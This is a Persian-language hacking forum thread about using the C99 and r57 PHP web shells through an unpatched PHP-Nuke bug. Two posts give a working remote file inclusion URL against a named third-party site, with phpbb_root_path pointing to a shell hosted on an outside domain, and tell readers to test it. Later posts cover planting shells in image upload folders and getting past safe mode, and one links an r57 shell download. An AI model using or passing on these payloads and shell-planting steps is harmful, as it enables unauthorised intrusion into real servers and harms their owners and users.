اطلاعیه

Collapse
No announcement yet.

سوال در مورد باگ و کارکرد C99

Collapse
X
 
  • Filter
  • زمان
  • Show
Clear All
new posts

  • سوال در مورد باگ Ùˆ کارکرد C99

    سلام
    خوبین ؟
    یه سوال .
    فکر کنید باگی مانند زیر برای Php nuke هست که هنوز پچ هم نشده
    www.site.com/index.php$$saa..-()1234~~12
    حالا منم برنامه C99 رو آپلود کردم
    www.mm.site.com/C99.php
    می خوام بدونم چه طوری باهاش کار کنم
    مسیر آپلود C99 رو کجا باید بنویسم
    یه توضیح کوچیک بدید .

  • #2
    اگه باگت (( RFI (( Remote File Include باشه باید یه آدرسی مثل آدرس زیر داشته باشی :
    کد:
    http://www.djwayne.net/modules/Forums/admin/index.php?phpbb_root_path=http://k0d.by.ru/shell/k0d.php?
    c99 رو هم اگه روی هاستی که PHP ساپورت میکنه آپلود کردی باید پسوندش TXT باشه ! آخر آدرس (( بعد آدرس شل )) یه علامت سوال ( ؟ ) بزار !
    ?Why So Serious

    Comment


    • #3
      نوشته اصلی توسط K0d
      اگه باگت (( RFI (( Remote File Include باشه باید یه آدرسی مثل آدرس زیر داشته باشی :
      کد:
      http://www.djwayne.net/modules/Forums/admin/index.php?phpbb_root_path=http://k0d.by.ru/shell/k0d.php?
      c99 رو هم اگه روی هاستی که PHP ساپورت میکنه آپلود کردی باید پسوندش TXT باشه ! آخر آدرس (( بعد آدرس شل )) یه علامت سوال ( ؟ ) بزار !
      php ساپورت نبودم مشكل نداره دوست من .
      در ضمن مشخص هست كه باگش rfi نيست .

      Comment


      • #4
        نوشته اصلی توسط ard
        php ساپورت نبودم مشكل نداره دوست من .
        .
        منم گفتم اگه php ساپورت میکرد باید پسوند شل TXT باشه ! اگه php ساپورت نمیکرد میتونه با پسوند php آپلود کنه !

        در ضمن مشخص هست كه باگش rfi نيست
        برای اینکه میخواست با c99 شل بگیره RFI رو براش توضیح دادم !
        ?Why So Serious

        Comment


        • #5
          نوشته اصلی توسط K0d
          منم گفتم اگه php ساپورت میکرد باید پسوند شل TXT باشه ! اگه php ساپورت نمیکرد میتونه با پسوند php آپلود کنه !


          برای اینکه میخواست با c99 شل بگیره RFI رو براش توضیح دادم !
          اينا چه حرفيه ؟پشتيباني كنه هم ميتونه php بزاره فقط علامت ؟ و پرميشن !!
          در ضمن هر كه c99 اپ كرد RFI نداره .بنده خدا فكر كرده باگش rfi هست ...باگش چي هست ؟
          remote code injection ?

          Comment


          • #6
            نوشته اصلی توسط ard
            اينا چه حرفيه ؟پشتيباني كنه هم ميتونه php بزاره فقط علامت ؟ و پرميشن !!
            در ضمن هر كه c99 اپ كرد RFI نداره .بنده خدا فكر كرده باگش rfi هست ...باگش چي هست ؟
            remote code injection ?
            اگه از php پشتیبانی کنه و شل رو با پسوند php آپلود کنیم همون شل رو سایتی که آپلود کردیم رو باز میکنه ! هیچ ربطی هم به علامت سوال و پرمیشن نداره !! (( میتونی تست کنی )) !!
            ?Why So Serious

            Comment


            • #7
              من تا حالا تست نكردم ولي قاعدتا نبايد مشكلي داشته باشه دوست عزيز ...
              شما داري يه فايل رو به صورت ريموت تزريق ميكني به يك فضاي ديگه .
              اگر باگ پچ شده باشه احتمال داره فايل c99 خودش باز شه .
              نميدونم شايد شما درست ميگي چون من تا حالا باهاش برخورد نداشتم .

              Comment


              • #8
                نوشته اصلی توسط ard
                من تا حالا تست نكردم ولي قاعدتا نبايد مشكلي داشته باشه دوست عزيز ...
                شما داري يه فايل رو به صورت ريموت تزريق ميكني به يك فضاي ديگه .
                اگر باگ پچ شده باشه احتمال داره فايل c99 خودش باز شه .
                نميدونم شايد شما درست ميگي چون من تا حالا باهاش برخورد نداشتم .
                من تست کردم ! رو همین آدرس تست کن :
                کد:
                http://www.djwayne.net/modules/Forums/admin/index.php?phpbb_root_path=http://k0d.by.ru/shell/k0d.php?
                به جای http://k0d.by.ru/shell/k0d.php یه شل با پسوند php رو یه سایت که php ساپورت میکنه بزار !! خودت میبینی .... !!
                ?Why So Serious

                Comment


                • #9
                  وقتی سوالش رو گنگ نوشته شما خودتون بیشتر سرد گم میشید
                  شاید یه اینجکت با استفاده از توابع php مثل system یا passthru بوده که تونسته شل رو با دستور lwp-download آپلود کنه
                  بیتشر هم در فولدر image ریخته میشه چون بنا به نیاز کاربران سایت برای آپلود عکس خودشون نیاز به پرمیشن مناسب داره
                  ابزار های شبکه
                  آموزش شبکه
                  کاملترین آموزش کرک
                  sigpic
                  خاطراتی طنز از جنگ

                  کاملترین مرجع حملات تزریقی Sql injection

                  Comment


                  • #10
                    نه بحث چيز ديگه بود .دوست عزيز حق با شماست اما جالب بود برام .تشكر

                    Comment


                    • #11
                      اقا من يك سوال دارم كه شايد بي ربط به بحث باشه
                      من c99 رو upload مي كنم و وقتي اجرا مي كنم كار مي كنه
                      ولي تو folder هاي ديگه نمي تونم برم
                      نمي تونم دستورات (command) اجرا كنم
                      فكر كنم مشكل همون پرميشن باشه
                      راه حل چيه؟
                      ¯/(°_o)\¯
                      بیچاره آن کسی است که گرفتار عقل شد **** آسوده آن کسی است که خر آمد و الاغ رفت
                      این چه شوری است که در دور قمر می بینم **** همه آفاق پر از فتنه و شر می بینم
                      اسب تازی شده مجروح به زیر پالن **** طوغ زرین بر گردن خر می بینم
                      Copyright: Enigma2

                      به اميد شبگردي بهتر

                      Comment


                      • #12
                        نوشته اصلی توسط h27
                        اقا من يك سوال دارم كه شايد بي ربط به بحث باشه
                        من c99 رو upload مي كنم و وقتي اجرا مي كنم كار مي كنه
                        ولي تو folder هاي ديگه نمي تونم برم
                        نمي تونم دستورات (command) اجرا كنم
                        فكر كنم مشكل همون پرميشن باشه
                        راه حل چيه؟
                        شاید سیف مود On باشه ؟ شاید هم پرمیشن نداری شاید هم ... 1 نگاه بکن بعد بیا اطلاعات بیشتر بده ... اگه این جوریه منم 1 r57 توی 1 آدرس مثل /home/nazanin/public_html/image/ آپلود کردم اما نمیدونم چرا تو فولدر /home/ نمیتونم برم .....
                        اما چون میگی نمیتونی کامند ران کنی احتمالا یا سیف مودت On هست یا فانکشن ها disable هستن ...
                        Last edited by M0h4mm4d; 04-08-2007, 06:00 PM.

                        آره اوبی ما رو دیدی بنداز سرو پایین
                        چون ما ده سال سر پاییم
                        !

                        Comment


                        • #13
                          نوشته اصلی توسط nazanin
                          شاید سیف مود On باشه ؟ شاید هم پرمیشن نداری شاید هم ... 1 نگاه بکن بعد بیا اطلاعات بیشتر بده ... اگه این جوریه منم 1 r57 توی 1 آدرس مثل /home/nazanin/public_html/image/ آپلود کردم اما نمیدونم چرا تو فولدر /home/ نمیتونم برم .....
                          اما چون میگی نمیتونی کامند ران کنی احتمالا یا سیف مودت On هست یا فانکشن ها disable هستن ...
                          آره سيف مود on هست.
                          اگه عيبي نداره مي توني بگي يعني چي؟
                          قبلا به خاطر بي سوادي و كمبود اطلاعات در مورد هك معذرت مي خوام
                          لطفا زير ديپلم توضيح بدين
                          الان كه امتحان كردم دسترسيم از بين رفته
                          ديگه خيلي به دردم هم نمي خوره ولي دونستنش بد نيست
                          ¯/(°_o)\¯
                          بیچاره آن کسی است که گرفتار عقل شد **** آسوده آن کسی است که خر آمد و الاغ رفت
                          این چه شوری است که در دور قمر می بینم **** همه آفاق پر از فتنه و شر می بینم
                          اسب تازی شده مجروح به زیر پالن **** طوغ زرین بر گردن خر می بینم
                          Copyright: Enigma2

                          به اميد شبگردي بهتر

                          Comment


                          • #14
                            نوشته اصلی توسط h27
                            اقا من يك سوال دارم كه شايد بي ربط به بحث باشه
                            من c99 رو upload مي كنم و وقتي اجرا مي كنم كار مي كنه
                            ولي تو folder هاي ديگه نمي تونم برم
                            نمي تونم دستورات (command) اجرا كنم
                            فكر كنم مشكل همون پرميشن باشه
                            راه حل چيه؟
                            منم چند بار این مشکل رو داشتم ! بعضی از سرور ها برای اینکه امنیتشون بالاس نمیتونی حتی روشون شل بریزی و بعضی ها هم شل میشه ریخت ولی هیچ کاری نمیشه کرد ! (( یکی از دوستام رو سرور خودش همه جور شلی ریخت ولی رو هیچ فایل یا فولدری نمیشد رفت هیچ کاری هم نمیشد کرد !! ))
                            راستی پیشنهاد میکنم به جای c99 از pang0 استفاده کنی ! شاید مشکلت حل شد ! (( شبیه همون r57 روسی میمونه ولی رو اکثر سرور هایی که شل های دیگه اجرا نمیشه من اینو اجرا کردم !! ))
                            http://www.parsaspace.com/k0d/r57.rar
                            ?Why So Serious

                            Comment


                            • #15
                              دوست عزیز

                              در صورتی که Safe-Mode=OFF باشد در صورتی که command ها را نبسته باشند می تونی command اجرا کنی البته یک سری اکسپلویت هست که در صورتی که در Safe-mode=OFF باشه و دستورات اجرا نشند باعث اجرا شدن می شوند.

                              بای بای

                              Comment

                              Working...
                              X